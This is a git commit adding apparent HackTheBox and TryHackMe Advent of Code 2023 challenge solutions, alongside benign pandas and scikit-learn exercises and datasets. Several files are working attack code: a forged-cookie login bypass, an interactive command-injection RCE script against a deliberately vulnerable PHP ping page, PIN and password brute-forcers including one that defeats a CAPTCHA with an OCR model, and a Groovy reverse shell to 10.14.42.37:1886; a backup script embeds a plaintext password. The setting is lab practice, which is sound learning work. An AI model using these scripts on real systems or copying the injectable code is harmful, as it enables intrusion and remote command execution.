Added initial code.
This commit is contained in:
parent
5808d2f805
commit
1f7a9b0566
22 changed files with 309132 additions and 1 deletions
17
htb/challenges/web-baby-auth/solve.py
Normal file
17
htb/challenges/web-baby-auth/solve.py
Normal file
|
@ -0,0 +1,17 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
import requests
|
||||
|
||||
ip = '188.166.175.58' # change this
|
||||
port = '32249' # change this
|
||||
|
||||
cookies = { 'PHPSESSID': 'eyJ1c2VybmFtZSI6ImFkbWluIn0K' }
|
||||
data = { 'username': 'admin', 'password': 'admin' }
|
||||
|
||||
r = requests.get(f'http://{ip}:{port}/', data = data, cookies = cookies)
|
||||
|
||||
data = r.text
|
||||
data = data.split('<h1>')[-1]
|
||||
data = data.split('</h1>')[0]
|
||||
|
||||
print(data.strip())
|
45
htb/challenges/web-baby-nginxatsu/config_51
Normal file
45
htb/challenges/web-baby-nginxatsu/config_51
Normal file
|
@ -0,0 +1,45 @@
|
|||
user www;
|
||||
pid /run/nginx.pid;
|
||||
error_log /dev/stderr info;
|
||||
|
||||
events {
|
||||
worker_connections 1024;
|
||||
}
|
||||
|
||||
http {
|
||||
server_tokens off;
|
||||
|
||||
charset utf-8;
|
||||
keepalive_timeout 20s;
|
||||
sendfile on;
|
||||
tcp_nopush on;
|
||||
client_max_body_size 2M;
|
||||
|
||||
include /etc/nginx/mime.types;
|
||||
|
||||
server {
|
||||
listen 80;
|
||||
server_name _;
|
||||
|
||||
index index.php;
|
||||
root /www/public;
|
||||
|
||||
# We sure hope so that we don't spill any secrets
|
||||
# within the open directory on /storage
|
||||
|
||||
location /storage {
|
||||
autoindex on;
|
||||
}
|
||||
|
||||
location / {
|
||||
try_files $uri $uri/ /index.php?$query_string;
|
||||
location ~ \.php$ {
|
||||
try_files $uri =404;
|
||||
fastcgi_pass unix:/run/php-fpm.sock;
|
||||
fastcgi_index index.php;
|
||||
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
|
||||
include fastcgi_params;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
19
htb/challenges/web-looking-glass/index.php
Normal file
19
htb/challenges/web-looking-glass/index.php
Normal file
|
@ -0,0 +1,19 @@
|
|||
<?php
|
||||
function getUserIp()
|
||||
{
|
||||
return $_SERVER['REMOTE_ADDR'];
|
||||
}
|
||||
|
||||
function runTest($test, $ip_address)
|
||||
{
|
||||
if ($test === 'ping')
|
||||
{
|
||||
system("ping -c4 ${ip_address}");
|
||||
}
|
||||
if ($test === 'traceroute')
|
||||
{
|
||||
system("traceroute ${ip_address}");
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
16
htb/challenges/web-looking-glass/solve.py
Normal file
16
htb/challenges/web-looking-glass/solve.py
Normal file
|
@ -0,0 +1,16 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
from requests import post
|
||||
|
||||
cmd = input('rce>> ')
|
||||
ip = '159.65.20.166' # change this
|
||||
port = '30526' # change this
|
||||
|
||||
data = {'test': 'ping', 'ip_address': f'{ip}; {cmd}', 'submit': 'Test'}
|
||||
r = post(f'{ip}:{port}/', data=data)
|
||||
|
||||
data = r.text
|
||||
data = data.split('packet loss\n')[-1]
|
||||
data = data.split('</textarea>')[0]
|
||||
|
||||
print(data.strip())
|
11
thm/aoc23/day02/1_packets_captured.py
Executable file
11
thm/aoc23/day02/1_packets_captured.py
Executable file
|
@ -0,0 +1,11 @@
|
|||
#!/usr/bin/env python3
|
||||
import pandas as pd
|
||||
import matplotlib.pyplot as plt
|
||||
|
||||
df = pd.read_csv('network_traffic.csv')
|
||||
df.head(5)
|
||||
|
||||
# We need to use Pandas count function on the dataframe
|
||||
# For example: dataframe.count()
|
||||
|
||||
print(df.count())
|
10
thm/aoc23/day02/2_ip_address.py
Executable file
10
thm/aoc23/day02/2_ip_address.py
Executable file
|
@ -0,0 +1,10 @@
|
|||
#!/usr/bin/env python3
|
||||
import pandas as pd
|
||||
|
||||
df = pd.read_csv('network_traffic.csv')
|
||||
df.head(5)
|
||||
|
||||
# We need to perform a groupby with Pandas size function the "Source" and "Destination" columns.
|
||||
# For example: dataframe.groupby(['ColumnName']).size()
|
||||
|
||||
print(df.groupby(['Source']).size().sort_values(ascending=False))
|
8
thm/aoc23/day02/3_protocol.py
Executable file
8
thm/aoc23/day02/3_protocol.py
Executable file
|
@ -0,0 +1,8 @@
|
|||
#!/usr/bin/env python3
|
||||
import pandas as pd
|
||||
import matplotlib.pyplot as plt
|
||||
|
||||
df = pd.read_csv('network_traffic.csv')
|
||||
df.head(5)
|
||||
|
||||
print(df['Protocol'].value_counts())
|
101
thm/aoc23/day02/network_traffic.csv
Normal file
101
thm/aoc23/day02/network_traffic.csv
Normal file
|
@ -0,0 +1,101 @@
|
|||
PacketNumber,Timestamp,Source,Destination,Protocol
|
||||
1,05:49.5,10.10.1.7,10.10.1.9,HTTP
|
||||
2,05:50.3,10.10.1.10,10.10.1.3,TCP
|
||||
3,06:10.3,10.10.1.1,10.10.1.2,HTTP
|
||||
4,06:10.4,10.10.1.9,10.10.1.3,ICMP
|
||||
5,06:10.4,10.10.1.1,10.10.1.7,ICMP
|
||||
6,06:10.4,10.10.1.10,10.10.1.8,DNS
|
||||
7,06:10.4,10.10.1.6,10.10.1.7,ICMP
|
||||
8,06:10.4,10.10.1.2,10.10.1.10,HTTP
|
||||
9,06:10.4,10.10.1.9,10.10.1.3,DNS
|
||||
10,06:10.4,10.10.1.7,10.10.1.7,TCP
|
||||
11,06:10.4,10.10.1.8,10.10.1.5,HTTP
|
||||
12,06:10.4,10.10.1.3,10.10.1.4,DNS
|
||||
13,06:10.4,10.10.1.2,10.10.1.5,ICMP
|
||||
14,06:10.4,10.10.1.3,10.10.1.2,DNS
|
||||
15,06:10.4,10.10.1.6,10.10.1.6,ICMP
|
||||
16,06:10.4,10.10.1.4,10.10.1.8,DNS
|
||||
17,06:10.4,10.10.1.9,10.10.1.3,ICMP
|
||||
18,06:10.4,10.10.1.8,10.10.1.9,HTTP
|
||||
19,06:10.5,10.10.1.5,10.10.1.7,HTTP
|
||||
20,06:10.5,10.10.1.9,10.10.1.1,DNS
|
||||
21,06:10.5,10.10.1.8,10.10.1.5,ICMP
|
||||
22,06:10.5,10.10.1.3,10.10.1.2,HTTP
|
||||
23,06:10.5,10.10.1.3,10.10.1.6,ICMP
|
||||
24,06:10.5,10.10.1.8,10.10.1.8,HTTP
|
||||
25,06:10.5,10.10.1.3,10.10.1.4,DNS
|
||||
26,06:10.5,10.10.1.4,10.10.1.10,ICMP
|
||||
27,06:10.6,10.10.1.2,10.10.1.7,ICMP
|
||||
28,06:10.6,10.10.1.3,10.10.1.5,TCP
|
||||
29,06:10.6,10.10.1.10,10.10.1.7,DNS
|
||||
30,06:10.6,10.10.1.9,10.10.1.3,DNS
|
||||
31,06:10.6,10.10.1.4,10.10.1.2,ICMP
|
||||
32,06:10.6,10.10.1.4,10.10.1.5,TCP
|
||||
33,06:10.6,10.10.1.10,10.10.1.3,TCP
|
||||
34,06:10.6,10.10.1.5,10.10.1.1,ICMP
|
||||
35,06:10.6,10.10.1.6,10.10.1.4,TCP
|
||||
36,06:10.6,10.10.1.6,10.10.1.8,ICMP
|
||||
37,06:10.6,10.10.1.6,10.10.1.2,DNS
|
||||
38,06:10.6,10.10.1.6,10.10.1.4,ICMP
|
||||
39,06:10.6,10.10.1.1,10.10.1.9,TCP
|
||||
40,06:10.6,10.10.1.6,10.10.1.10,DNS
|
||||
41,06:10.6,10.10.1.8,10.10.1.7,HTTP
|
||||
42,06:10.6,10.10.1.2,10.10.1.6,TCP
|
||||
43,06:10.6,10.10.1.8,10.10.1.2,TCP
|
||||
44,06:10.6,10.10.1.4,10.10.1.1,TCP
|
||||
45,06:10.6,10.10.1.1,10.10.1.8,ICMP
|
||||
46,06:10.6,10.10.1.8,10.10.1.2,HTTP
|
||||
47,06:10.6,10.10.1.9,10.10.1.9,ICMP
|
||||
48,06:10.6,10.10.1.1,10.10.1.5,TCP
|
||||
49,06:10.6,10.10.1.5,10.10.1.10,DNS
|
||||
50,06:10.6,10.10.1.6,10.10.1.2,DNS
|
||||
51,05:49.5,10.10.1.10,10.10.1.4,TCP
|
||||
52,05:50.3,10.10.1.6,10.10.1.7,ICMP
|
||||
53,06:10.3,10.10.1.3,10.10.1.7,HTTP
|
||||
54,06:10.4,10.10.1.2,10.10.1.9,HTTP
|
||||
55,06:10.4,10.10.1.7,10.10.1.5,DNS
|
||||
56,06:10.4,10.10.1.4,10.10.1.4,HTTP
|
||||
57,06:10.4,10.10.1.9,10.10.1.10,ICMP
|
||||
58,06:10.4,10.10.1.9,10.10.1.9,TCP
|
||||
59,06:10.4,10.10.1.8,10.10.1.2,ICMP
|
||||
60,06:10.4,10.10.1.2,10.10.1.9,DNS
|
||||
61,06:10.4,10.10.1.6,10.10.1.3,ICMP
|
||||
62,06:10.4,10.10.1.4,10.10.1.6,DNS
|
||||
63,06:10.4,10.10.1.4,10.10.1.4,TCP
|
||||
64,06:10.4,10.10.1.3,10.10.1.4,HTTP
|
||||
65,06:10.4,10.10.1.4,10.10.1.6,HTTP
|
||||
66,06:10.4,10.10.1.9,10.10.1.3,HTTP
|
||||
67,06:10.4,10.10.1.6,10.10.1.8,TCP
|
||||
68,06:10.4,10.10.1.10,10.10.1.6,TCP
|
||||
69,06:10.5,10.10.1.2,10.10.1.7,HTTP
|
||||
70,06:10.5,10.10.1.6,10.10.1.1,HTTP
|
||||
71,06:10.5,10.10.1.1,10.10.1.9,DNS
|
||||
72,06:10.5,10.10.1.9,10.10.1.5,ICMP
|
||||
73,06:10.5,10.10.1.10,10.10.1.5,DNS
|
||||
74,06:10.5,10.10.1.6,10.10.1.10,DNS
|
||||
75,06:10.5,10.10.1.2,10.10.1.8,HTTP
|
||||
76,06:10.5,10.10.1.2,10.10.1.3,TCP
|
||||
77,06:10.6,10.10.1.7,10.10.1.3,ICMP
|
||||
78,06:10.6,10.10.1.3,10.10.1.7,DNS
|
||||
79,06:10.6,10.10.1.3,10.10.1.7,TCP
|
||||
80,06:10.6,10.10.1.7,10.10.1.8,HTTP
|
||||
81,06:10.6,10.10.1.1,10.10.1.6,TCP
|
||||
82,06:10.6,10.10.1.3,10.10.1.2,HTTP
|
||||
83,06:10.6,10.10.1.5,10.10.1.3,DNS
|
||||
84,06:10.6,10.10.1.3,10.10.1.2,TCP
|
||||
85,06:10.6,10.10.1.4,10.10.1.8,ICMP
|
||||
86,06:10.6,10.10.1.4,10.10.1.2,DNS
|
||||
87,06:10.6,10.10.1.4,10.10.1.2,DNS
|
||||
88,06:10.6,10.10.1.4,10.10.1.1,HTTP
|
||||
89,06:10.6,10.10.1.2,10.10.1.3,TCP
|
||||
90,06:10.6,10.10.1.2,10.10.1.5,HTTP
|
||||
91,06:10.6,10.10.1.2,10.10.1.3,ICMP
|
||||
92,06:10.6,10.10.1.10,10.10.1.2,ICMP
|
||||
93,06:10.6,10.10.1.9,10.10.1.4,HTTP
|
||||
94,06:10.6,10.10.1.6,10.10.1.9,TCP
|
||||
95,06:10.6,10.10.1.4,10.10.1.4,TCP
|
||||
96,06:10.6,10.10.1.8,10.10.1.3,DNS
|
||||
97,06:10.6,10.10.1.1,10.10.1.3,ICMP
|
||||
98,06:10.6,10.10.1.3,10.10.1.3,DNS
|
||||
99,06:10.6,10.10.1.4,10.10.1.3,TCP
|
||||
100,06:10.6,10.10.1.5,10.10.1.2,ICMP
|
|
20
thm/aoc23/day03/brute.py
Normal file
20
thm/aoc23/day03/brute.py
Normal file
|
@ -0,0 +1,20 @@
|
|||
#!/usr/bin/env python3
|
||||
import requests
|
||||
|
||||
url = 'http://10.10.136.61:8000/login.php'
|
||||
|
||||
def login(pin):
|
||||
r = requests.post(url, data = { 'pin': pin }, allow_redirects=True)
|
||||
return r
|
||||
|
||||
#print(login('123').text)
|
||||
with open('pw.lst', 'r') as fh:
|
||||
pins = [ line.strip() for line in fh.read().split('\n') if line ]
|
||||
|
||||
for pin in pins:
|
||||
res = login(pin).text
|
||||
data = res.split('<h1 class="text-5xl text-red">')[-1]
|
||||
data = data.split('</h1>')[0]
|
||||
if data != 'Access Denied':
|
||||
print(f'The PIN is: {pin}')
|
||||
break
|
4096
thm/aoc23/day03/pw.lst
Normal file
4096
thm/aoc23/day03/pw.lst
Normal file
File diff suppressed because it is too large
Load diff
23
thm/aoc23/day12/backup.sh
Normal file
23
thm/aoc23/day12/backup.sh
Normal file
|
@ -0,0 +1,23 @@
|
|||
#!/bin/sh
|
||||
|
||||
mkdir /var/lib/jenkins/backup
|
||||
mkdir /var/lib/jenkins/backup/jobs /var/lib/jenkins/backup/nodes /var/lib/jenkins/backup/plugins /var/lib/jenkins/backup/secrets /var/lib/jenkins/backup/users
|
||||
|
||||
cp /var/lib/jenkins/*.xml /var/lib/jenkins/backup/
|
||||
cp -r /var/lib/jenkins/jobs/ /var/lib/jenkins/backup/jobs/
|
||||
cp -r /var/lib/jenkins/nodes/ /var/lib/jenkins/backup/nodes/
|
||||
cp /var/lib/jenkins/plugins/*.jpi /var/lib/jenkins/backup/plugins/
|
||||
cp /var/lib/jenkins/secrets/* /var/lib/jenkins/backup/secrets/
|
||||
cp -r /var/lib/jenkins/users/* /var/lib/jenkins/backup/users/
|
||||
|
||||
tar czvf /var/lib/jenkins/backup.tar.gz /var/lib/jenkins/backup/
|
||||
/bin/sleep 5
|
||||
|
||||
username="tracy"
|
||||
password="13_1n_33"
|
||||
Ip="localhost"
|
||||
sshpass -p "$password" scp /var/lib/jenkins/backup.tar.gz $username@$Ip:/home/tracy/backups
|
||||
/bin/sleep 10
|
||||
|
||||
rm -rf /var/lib/jenkins/backup/
|
||||
rm -rf /var/lib/jenkins/backup.tar.gz
|
4
thm/aoc23/day12/rev-shell.groovy
Normal file
4
thm/aoc23/day12/rev-shell.groovy
Normal file
|
@ -0,0 +1,4 @@
|
|||
String host="10.14.42.37";
|
||||
int port=1886;
|
||||
String cmd="/bin/bash";
|
||||
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
|
100
thm/aoc23/day14/detector.py
Normal file
100
thm/aoc23/day14/detector.py
Normal file
|
@ -0,0 +1,100 @@
|
|||
#These are the imports that we need for our Neural Network
|
||||
#Numpy is a powerful array and matrix library used to format our data
|
||||
import numpy as np
|
||||
#Pandas is a machine learning library that also allows for reading and formatting data structures
|
||||
import pandas as pd
|
||||
#This will be used to split our data
|
||||
from sklearn.model_selection import train_test_split
|
||||
#This is used to normalize our data
|
||||
from sklearn.preprocessing import StandardScaler
|
||||
#This is used to encode our text data to integers
|
||||
from sklearn.preprocessing import LabelEncoder
|
||||
#This is our Multi-Layer Perceptron Neural Network
|
||||
from sklearn.neural_network import MLPClassifier
|
||||
|
||||
#These are the colour labels that we will convert to int
|
||||
colours = ["Red", "Blue", "Green", "Yellow", "Pink", "Purple", "Orange"]
|
||||
|
||||
|
||||
#Read the training and testing data files
|
||||
training_data = pd.read_csv("training_dataset.csv")
|
||||
training_data.head()
|
||||
|
||||
testing_data = pd.read_csv("testing_dataset.csv")
|
||||
testing_data.head()
|
||||
|
||||
#The Neural Network cannot take Strings as input, therefore we will encode the strings as integers
|
||||
encoder = LabelEncoder()
|
||||
encoder.fit(training_data["Colour Scheme"])
|
||||
training_data["Colour Scheme"] = encoder.transform(training_data["Colour Scheme"])
|
||||
testing_data["Colour Scheme"] = encoder.transform(testing_data["Colour Scheme"])
|
||||
|
||||
#Read the data we will train on
|
||||
X = np.asanyarray(training_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']])
|
||||
#Read the labels of our training data
|
||||
y = np.asanyarray(training_data['Defective'].astype('int'))
|
||||
|
||||
#Read our testing data
|
||||
test_X = np.asanyarray(testing_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']])
|
||||
|
||||
#This will split our training dataset into two with a 80/20 split
|
||||
train_X, validate_X, train_y, validate_y = train_test_split(X, y, test_size=0.2)
|
||||
|
||||
print ("Sample of our data:")
|
||||
print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3]))
|
||||
|
||||
#Normalize our dataset
|
||||
scaler = StandardScaler()
|
||||
scaler.fit(train_X)
|
||||
|
||||
train_X = scaler.transform(train_X)
|
||||
validate_X = scaler.transform(validate_X)
|
||||
test_X = scaler.transform(test_X)
|
||||
|
||||
print ("Sampe of our data after normalization:")
|
||||
print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3]))
|
||||
|
||||
#Create our classifier
|
||||
clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(15, 2), max_iter=10000)
|
||||
|
||||
print ("Starting to training our Neural Network")
|
||||
|
||||
#Train our classifier
|
||||
clf.fit(train_X, train_y)
|
||||
|
||||
#Validate our Neural Network
|
||||
y_predicted = clf.predict(validate_X)
|
||||
|
||||
#This function tests how well your Neural Network performs with the validation dataset
|
||||
count_correct = 0
|
||||
count_incorrect = 0
|
||||
for x in range(len(y_predicted)):
|
||||
|
||||
if (y_predicted[x] == validate_y[x]):
|
||||
count_correct += 1
|
||||
else:
|
||||
count_incorrect += 1
|
||||
|
||||
print ("Training has been completed, validating neural network now....")
|
||||
print ("Total Correct:\t\t" + str(count_correct))
|
||||
print ("Total Incorrect:\t" + str(count_incorrect))
|
||||
|
||||
accuracy = ((count_correct * 1.0) / (1.0 * (count_correct + count_incorrect)))
|
||||
|
||||
print ("Network Accuracy:\t" + str(accuracy * 100) + "%")
|
||||
|
||||
print ("Now we will predict the testing dataset for which we don't have the answers for...")
|
||||
|
||||
#Make prediction on the testing data that was not labelled by the elves
|
||||
y_test_predictions = clf.predict(test_X)
|
||||
|
||||
#This function will save your predictions to a textfile that can be uploaded for scoring
|
||||
print ("Saving predictions to a file")
|
||||
|
||||
output = open("predictions.txt", 'w')
|
||||
|
||||
for value in y_test_predictions:
|
||||
output.write(str(value) + "\n")
|
||||
|
||||
print ("Predictions are saved, this file can now be uploaded to verify your Neural Network")
|
||||
output.close()
|
200001
thm/aoc23/day14/testing_dataset.csv
Normal file
200001
thm/aoc23/day14/testing_dataset.csv
Normal file
File diff suppressed because it is too large
Load diff
100001
thm/aoc23/day14/training_dataset.csv
Normal file
100001
thm/aoc23/day14/training_dataset.csv
Normal file
File diff suppressed because it is too large
Load diff
40
thm/aoc23/day15/complete.py
Normal file
40
thm/aoc23/day15/complete.py
Normal file
|
@ -0,0 +1,40 @@
|
|||
#!/usr/bin/env python3
|
||||
import numpy as np
|
||||
import pandas as pd
|
||||
from sklearn.feature_extraction.text import CountVectorizer
|
||||
from sklearn.model_selection import train_test_split
|
||||
from sklearn.naive_bayes import MultinomialNB
|
||||
from sklearn.metrics import classification_report
|
||||
|
||||
#Read the email dataset.
|
||||
data = pd.read_csv('emails_dataset.csv')
|
||||
df = pd.DataFrame(data)
|
||||
|
||||
#Convert text to numbers.
|
||||
vectorizer = CountVectorizer()
|
||||
X = vectorizer.fit_transform(df['Message'])
|
||||
|
||||
#Split the dataset for training and testing
|
||||
y = df['Classification']
|
||||
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
|
||||
|
||||
#Train the model
|
||||
clf = MultinomialNB()
|
||||
clf.fit(X_train, y_train)
|
||||
|
||||
#Evaluate the model's performance
|
||||
y_pred = clf.predict(X_test)
|
||||
print(classification_report(y_test, y_pred))
|
||||
|
||||
#Add a simple test to the model
|
||||
message = vectorizer.transform(["Today's Offer! Claim ur $150 worth of discount vouchers! Text YES to 85023 now! SavaMob, member offers mobile! T Cs 08717898035. $3.00 Sub. 16 . Unsbub reply X"])
|
||||
prediction = clf.predict(message)
|
||||
print("The email is: ", prediction[0])
|
||||
|
||||
#Run the complete test of the emails inside "test_emails.csv"
|
||||
test_data = pd.read_csv("test_emails.csv")
|
||||
|
||||
X_new = vectorizer.transform(test_data['Messages'])
|
||||
new_predictions = clf.predict(X_new)
|
||||
results_df = pd.DataFrame({'Messages': test_data['Messages'], 'Prediction': new_predictions})
|
||||
print(results_df)
|
4452
thm/aoc23/day15/emails_dataset.csv
Normal file
4452
thm/aoc23/day15/emails_dataset.csv
Normal file
File diff suppressed because it is too large
Load diff
37
thm/aoc23/day15/test_emails.csv
Normal file
37
thm/aoc23/day15/test_emails.csv
Normal file
|
@ -0,0 +1,37 @@
|
|||
Messages
|
||||
Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations.
|
||||
Kind of. Took it to garage. Centre part of exhaust needs replacing. Part ordered n taking it to be fixed tomo morning.
|
||||
Fighting with the world is easy
|
||||
Why must we sit around and wait for summer days to celebrate. Such a magical sight when the worlds dressed in white. Oooooh let there be snow.
|
||||
Oh
|
||||
ALERT!!!! Get a Chance to Win a 1000$ voucher on your Next Purchase by share the information about the Best Festival company-- the secret code is 'I_HaTe_BesT_FestiVal'
|
||||
i cant talk to you now.i will call when i can.dont keep calling.
|
||||
Today's Offer! Claim ur £150 worth of discount vouchers! Text YES to 85023 now! SavaMob
|
||||
Don't worry though
|
||||
Hey mate. Spoke to the mag people. We‘re on. the is deliver by the end of the month. Deliver on the 24th sept. Talk later.
|
||||
I sent you the prices and do you mean the g
|
||||
Goodmorning
|
||||
Its good
|
||||
Ü takin linear algebra today?
|
||||
Hey so whats the plan this sat?
|
||||
Hey i will be late ah... Meet you at 945+
|
||||
I fetch yun or u fetch?
|
||||
Ok lor. I ned 2 go toa payoh 4 a while 2 return smth u wan 2 send me there or wat?
|
||||
I like dis sweater fr mango but no more my size already so irritating.
|
||||
What makes you most happy?
|
||||
No idea
|
||||
All done
|
||||
Did either of you have any idea's? Do you know of anyplaces doing something?
|
||||
Yes..he is really great..bhaji told kallis best cricketer after sachin in world:).very tough to get out.
|
||||
Hey... Very inconvenient for your sis a not huh?
|
||||
Great! So what attracts you to the brothas?
|
||||
In life when you face choices Just toss a coin not becoz its settle the question But while the coin in the air U will know what your heart is hoping for. Gudni8
|
||||
Haha mayb u're rite... U know me well. Da feeling of being liked by someone is gd lor. U faster go find one then all gals in our group attached liao.
|
||||
Somebody set up a website where you can play hold em using eve online spacebucks
|
||||
I'm really sorry I lit your hair on fire
|
||||
Hello! How's you and how did saturday go? I was just texting to see if you'd decided to do anything tomo. Not that i'm trying to invite myself or anything!
|
||||
And very importantly
|
||||
Ok Chinese food on its way. When I get fat you're paying for my lipo.
|
||||
I'm used to it. I just hope my agents don't drop me since i've only booked a few things this year. This whole me in boston
|
||||
Mode men or have you left.
|
||||
You have to pls make a note of all she.s exposed to. Also find out from her school if anyone else was vomiting. Is there a dog or cat in the house? Let me know later.
|
|
82
thm/aoc23/day16/brute.py
Normal file
82
thm/aoc23/day16/brute.py
Normal file
|
@ -0,0 +1,82 @@
|
|||
#!/usr/bin/env python3
|
||||
import requests
|
||||
import base64
|
||||
import json
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
username = 'admin'
|
||||
passwords = []
|
||||
|
||||
# URLs for our requests
|
||||
website_url = 'http://hqadmin.thm:8000'
|
||||
model_url = 'http://localhost:8501/v1/models/ocr:predict'
|
||||
|
||||
# Load in the passwords for Brute Forcing
|
||||
with open('passwords.txt', 'r') as wordlist:
|
||||
lines = wordlist.readlines()
|
||||
for line in lines:
|
||||
passwords.append(line.replace('\n', ''))
|
||||
|
||||
access_granted = False
|
||||
count = 0
|
||||
|
||||
# Run the Brute Force Attack until we are out of passwords or have gained access
|
||||
while(access_granted == False and count < len(passwords)):
|
||||
# Run a Brute Force for each password
|
||||
password = passwords[count]
|
||||
|
||||
# Connect to webapp to get the CAPTCHA.
|
||||
# We use a session so the cookies are taken care of for us.
|
||||
sess = requests.session()
|
||||
r = sess.get(website_url)
|
||||
|
||||
# Use soup to parse the HTML and extract the CAPTCHA image.
|
||||
soup = BeautifulSoup(r.content, 'html.parser')
|
||||
img = soup.find('img')
|
||||
encoded_image = img['src'].split(' ')[1]
|
||||
|
||||
# Build the JSON request to send to the CAPTCHA predictor
|
||||
model_data = {
|
||||
'signature_name' : 'serving_default',
|
||||
'inputs' : {'input' : {'b64' : encoded_image} }
|
||||
}
|
||||
|
||||
# Send the CAPTCHA prediction request and load the response
|
||||
r = requests.post(model_url, json=model_data)
|
||||
prediction = r.json()
|
||||
probability = prediction['outputs']['probability']
|
||||
answer = prediction['outputs']['output']
|
||||
|
||||
# Increase our guessing accuracy by only submitting the answer if we are more than 90% sure
|
||||
if (probability < 0.90):
|
||||
# If lower than 90%, no submission of CAPTCHA
|
||||
print('[-] Prediction probability to low, not submitting CAPTCHA')
|
||||
continue
|
||||
|
||||
# Otherwise, submit the answer in a POST data
|
||||
# Build the POST data
|
||||
website_data = {
|
||||
'username' : username,
|
||||
'password' : password,
|
||||
'captcha' : answer,
|
||||
'submit' : 'Submit+Query'
|
||||
}
|
||||
|
||||
# Submit our Brute Force Attack
|
||||
r = sess.post(website_url, data=website_data)
|
||||
|
||||
# Read the response and interpret the results of the attempt
|
||||
response = r.text
|
||||
|
||||
# If the response tells us that we have submitted the wrong CAPTCHA, we try again with this password
|
||||
if ('Incorrect CAPTCHA value supplied' in response):
|
||||
print('[-] Incorrect CAPTCHA value was supplied. We will resubmit this password')
|
||||
continue
|
||||
# If the response tells us that we have submitted the wrong password, we can try with the next password
|
||||
elif ('Incorrect Username or Password' in response):
|
||||
print('[-] Invalid credentials -- Username ' + username + ' Password: ' + password)
|
||||
count += 1
|
||||
# Otherwise, we have found the correct password!
|
||||
else:
|
||||
print ('[+] Access Granted! -- Username: ' + username + ' Password: ' + password)
|
||||
access_granted = True
|
13
thm/aoc23/day16/captcha_img.py
Normal file
13
thm/aoc23/day16/captcha_img.py
Normal file
|
@ -0,0 +1,13 @@
|
|||
#!/usr/bin/env python3
|
||||
from captcha.image import ImageCaptcha
|
||||
import random
|
||||
|
||||
amount = 99999
|
||||
count = 10000
|
||||
|
||||
while count <= amount:
|
||||
image = ImageCaptcha(width = 160, height = 60)
|
||||
text = str(count)
|
||||
count += 1
|
||||
data = image.generate(text)
|
||||
image.write(text, (text) + ".png")
|
35
thm/aoc23/day16/labels.py
Normal file
35
thm/aoc23/day16/labels.py
Normal file
|
@ -0,0 +1,35 @@
|
|||
#!/usr/bin/env python3
|
||||
import glob
|
||||
from sklearn.model_selection import train_test_split
|
||||
|
||||
data = glob.glob("../raw_data/*.png")
|
||||
|
||||
print(data)
|
||||
|
||||
dataset = []
|
||||
labels = []
|
||||
|
||||
for item in data:
|
||||
label = item.split('/')[1].replace(".png","") #dataset/32154.png
|
||||
labels.append(label)
|
||||
dataset.append(item)
|
||||
|
||||
train_X, validate_X, train_y, validate_y = train_test_split(dataset, labels, test_size=0.2)
|
||||
|
||||
f = open('training.txt', 'w')
|
||||
|
||||
count = 0
|
||||
|
||||
for count in range(len(train_X)):
|
||||
f.write(train_X[count] + " " + train_y[count] + "\n")
|
||||
|
||||
f.close()
|
||||
|
||||
count = 0
|
||||
|
||||
f = open('testing.txt', 'w')
|
||||
|
||||
for count in range(len(validate_X)):
|
||||
f.write(validate_X[count] + " " + validate_y[count] + "\n")
|
||||
|
||||
f.close()
|
Loading…
Reference in a new issue